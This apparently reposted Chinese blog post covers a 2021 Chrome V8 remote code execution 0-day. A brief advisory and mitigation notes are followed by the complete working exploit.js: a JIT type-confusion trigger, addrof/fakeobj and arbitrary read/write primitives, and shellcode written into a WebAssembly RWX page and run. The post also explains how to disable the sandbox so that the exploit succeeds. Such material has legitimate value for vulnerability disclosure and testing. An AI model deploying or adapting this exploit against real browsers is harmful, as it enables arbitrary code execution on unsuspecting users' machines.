zoukankan      html  css  js  c++  java
  • Chrome 远程代码执行0Day漏洞(20210413)

    2021年04月13日,360CERT监测发现国外安全研究员发布了Chrome 远程代码执行 0Day的POC详情.

    该漏洞已验证.

    漏洞级别

    严重;Google:Chrome: <=89.0.4389.114

    组件: Chrome

    漏洞类型: 命令执行

    影响: 服务器接管

    简述: 攻击者利用此漏洞,可以构造一个恶意的web页面,当用户访问该页面时,会造成远程代码执行。

    目前该漏洞已在最新版本Chrome上得到验证

    漏洞修复建议:

    通用修补建议

    目前Google只针对该漏洞发布了beta测试版Chrome(90.0.4430.70)修复,Chrome正式版(89.0.4389.114)仍存在漏洞,请关注官方Chrome正式版更新,及时修补漏洞。

    临时修补建议

    强烈建议广大用户在SandBox模式下运行Chrome

    POC

    https://github.com/r4j0x00/exploits/tree/master/chrome-0day

    将以下网页丢到WEB服务里,用待测的chrome访问即可触发。但要注意,运行的chrome要在沙盒sandbox关闭的状态下才能利用成功!

    可以在chrom快捷方式属性增加--no-sandbox  也可以在命令行启用chrome 键入:chrome.exe --no-sandbox

    exploit.html代码:

    <script src="exploit.js"></script>
    

    exploit.js代码:

      1 /*
      2 /*
      3 BSD 2-Clause License
      4 Copyright (c) 2021, rajvardhan agarwal
      5 All rights reserved.
      6 Redistribution and use in source and binary forms, with or without
      7 modification, are permitted provided that the following conditions are met:
      8 1. Redistributions of source code must retain the above copyright notice, this
      9    list of conditions and the following disclaimer.
     10 2. Redistributions in binary form must reproduce the above copyright notice,
     11    this list of conditions and the following disclaimer in the documentation
     12    and/or other materials provided with the distribution.
     13 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
     14 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
     15 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
     16 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
     17 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
     18 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
     19 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
     20 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
     21 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
     22 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
     23 */
     24 
     25 var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
     26 var wasm_mod = new WebAssembly.Module(wasm_code);
     27 var wasm_instance = new WebAssembly.Instance(wasm_mod);
     28 var f = wasm_instance.exports.main;
     29 
     30 var buf = new ArrayBuffer(8);
     31 var f64_buf = new Float64Array(buf);
     32 var u64_buf = new Uint32Array(buf);
     33 let buf2 = new ArrayBuffer(0x150);
     34 
     35 function ftoi(val) {
     36     f64_buf[0] = val;
     37     return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
     38 }
     39 
     40 function itof(val) {
     41     u64_buf[0] = Number(val & 0xffffffffn);
     42     u64_buf[1] = Number(val >> 32n);
     43     return f64_buf[0];
     44 }
     45 
     46 const _arr = new Uint32Array([2**31]);
     47 
     48 function foo(a) {
     49     var x = 1;
     50     x = (_arr[0] ^ 0) + 1;
     51 
     52     x = Math.abs(x);
     53     x -= 2147483647;
     54     x = Math.max(x, 0);
     55 
     56     x -= 1;
     57     if(x==-1) x = 0;
     58 
     59     var arr = new Array(x);
     60     arr.shift();
     61     var cor = [1.1, 1.2, 1.3];
     62 
     63     return [arr, cor];
     64 }
     65 
     66 for(var i=0;i<0x3000;++i)
     67     foo(true);
     68 
     69 var x = foo(false);
     70 var arr = x[0];
     71 var cor = x[1];
     72 
     73 const idx = 6;
     74 arr[idx+10] = 0x4242;
     75 
     76 function addrof(k) {
     77     arr[idx+1] = k;
     78     return ftoi(cor[0]) & 0xffffffffn;
     79 }
     80 
     81 function fakeobj(k) {
     82     cor[0] = itof(k);
     83     return arr[idx+1];
     84 }
     85 
     86 var float_array_map = ftoi(cor[3]);
     87 
     88 var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
     89 var fake = fakeobj(addrof(arr2) + 0x20n);
     90 
     91 function arbread(addr) {
     92     if (addr % 2n == 0) {
     93         addr += 1n;
     94     }
     95     arr2[1] = itof((2n << 32n) + addr - 8n);
     96     return (fake[0]);
     97 }
     98 
     99 function arbwrite(addr, val) {
    100     if (addr % 2n == 0) {
    101         addr += 1n;
    102     }
    103     arr2[1] = itof((2n << 32n) + addr - 8n);
    104     fake[0] = itof(BigInt(val));
    105 }
    106 
    107 function copy_shellcode(addr, shellcode) {
    108     let dataview = new DataView(buf2);
    109     let buf_addr = addrof(buf2);
    110     let backing_store_addr = buf_addr + 0x14n;
    111     arbwrite(backing_store_addr, addr);
    112 
    113     for (let i = 0; i < shellcode.length; i++) {
    114         dataview.setUint32(4*i, shellcode[i], true);
    115     }
    116 }
    117 
    118 var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
    119 console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));
    120 var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957];
    121 copy_shellcode(rwx_page_addr, shellcode);
    122 f();
    exploit.js

     

    chrome安全考虑默认启动都是在沙盒中,因利用要诱导用户在no-sandbox下访问才能触发漏洞,所以利用又加了一个条件...

    为美好的生活奋斗!
  • 相关阅读:
    js隐藏嵌入表边框
    把字符串中的小写字母转换成大写字母
    字符串逆序
    嵌入式C语言编程与AVR技巧(一)——C语言环境访问MCU寄存器
    寻找第K大的数的方法总结
    ASCII码(全)
    把字符串中的小写字母转换成大写字母
    纯C 字符串操作函数 实现 (strcpy, strncpy, memcpy, memset, strcat, strlen ... ) .
    ASCII码(全)
    字符串逆序
  • 原文地址:https://www.cnblogs.com/ethtool/p/14652420.html
Copyright © 2011-2022 走看看